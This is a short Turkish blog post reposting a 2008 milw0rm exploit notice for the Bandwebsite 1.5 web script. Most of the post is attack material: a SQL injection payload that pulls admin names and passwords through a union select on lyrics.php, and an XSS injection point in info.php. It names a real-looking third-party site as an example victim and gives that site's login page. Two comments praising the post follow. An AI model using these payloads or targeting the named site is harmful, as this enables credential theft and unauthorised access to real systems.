Bandwebsite 1.5 (SQL/XSS) Multiple Remote Vulnerabilities
link: http://www.milw0rm.com/exploits/7215
Discovered By: ZoRLu
exploit:
http://localhost/script/lyrics.php?section=full&id=[SQL]
http://localhost/script/info.php?section=[XSS]
[SQL]
99999999+union+select+1,name,3,pass,5+from+admin--
example:
http://www.caro-kunde.de/lyrics.php?section=full&id=99999999+union+select+1,name,3,pass,5+from+admin--
login:
http://www.caro-kunde.de/login.php
XSS:
http://www.caro-kunde.de/info.php?section=[XSS]
24 Kasım 2008 Pazartesi
Kaydol:
Kayıt Yorumları (Atom)
2 yorum:
love your blog good stuff
thanks a lot Mikey ;)
Yorum Gönder